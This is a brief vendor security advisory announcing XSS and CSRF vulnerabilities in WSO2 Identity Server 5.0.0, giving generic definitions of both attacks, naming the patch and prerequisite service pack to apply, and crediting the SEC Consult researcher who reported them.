The WSO2 Identity Server 5.0.0 is vulnerable to XSS and CSRF attacks.
Severity: CRITICAL - Patch Immediately.
XSS enables attackers to inject client-side script into web pages viewed by other users. CSRF is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
XSS : Could be used by attackers to bypass access controls such as the same-origin policy.
CSRF: Malicious exploit of a website whereby unauthorized commands are transmitted from an user that the website trusts
Apply the patch WSO2-CARBON-PATCH-4.2.0-1256. Follow the instructions in the README file.
Note. Make sure to apply IS Service Pack-1 (WSO2-IS-5.0.0-SP01) before apply above security patch
WSO2 thanks Wolfgang Ettlinger (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab (https://www.sec-consult.com/) for responsibly reporting the identified issues and working with us as we addressed them.